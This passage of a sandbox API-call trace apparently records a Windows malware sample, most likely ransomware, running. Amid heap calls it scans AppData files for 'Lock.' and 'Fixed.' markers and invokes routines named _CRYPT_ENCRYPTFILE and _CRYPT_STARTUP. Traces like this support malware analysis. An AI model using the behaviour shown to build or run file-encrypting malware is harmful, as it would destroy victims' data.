Size=0x8) returned 0x2e54b98 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0239.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0239.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0239.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0239.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0239.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0239.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0239.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0239.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0239.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6a) returned 0x2e564e0 [0239.400] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/TXuB6gyi89__NoT9.swf", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\TXuB6gyi89__NoT9.swf", lpFilePart=0x8cf650*="TXuB6gyi89__NoT9.swf") returned 0x34 [0239.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0239.400] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\TXuB6gyi89__NoT9.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\txub6gyi89__not9.swf")) returned 0xffffffff [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0239.401] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0239.401] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.401] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0239.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0239.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0239.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UR7Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0239.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R7Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0239.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0239.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0239.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0239.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0239.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0239.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0239.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0239.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0239.402] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0239.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0239.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0239.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0239.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0239.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UR7Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0239.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R7Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0239.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7Y.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0239.403] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0239.403] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0239.403] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0239.403] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0239.403] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0239.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0239.404] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0239.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0239.405] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0239.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.405] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0239.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.405] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/UR7Y.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b742c0, ftCreationTime.dwHighDateTime=0x1d5f067, ftLastAccessTime.dwLowDateTime=0x2d91d700, ftLastAccessTime.dwHighDateTime=0x1d5e37c, ftLastWriteTime.dwLowDateTime=0x2d91d700, ftLastWriteTime.dwHighDateTime=0x1d5e37c, nFileSizeHigh=0x0, nFileSizeLow=0x11111, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="UR7Y.png", cAlternateFileName="")) returned 0xa876d0 [0239.405] FindClose (in: hFindFile=0xa876d0 | out: hFindFile=0xa876d0) returned 1 [0239.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0239.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0239.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0239.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0239.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.406] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.406] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.406] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0239.406] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.406] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0239.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04038 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0239.407] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04038 | out: hHeap=0x970000) returned 1 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0239.407] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0239.407] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0239.407] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.407] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0239.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0239.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0239.408] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0239.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0239.408] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0239.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0239.408] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.409] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.409] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0239.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0239.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0239.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0239.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0239.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bc8 [0239.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0239.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0239.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0239.409] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.409] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0239.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0239.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0239.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0239.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0239.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0239.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0239.410] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0239.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0239.410] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0239.410] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 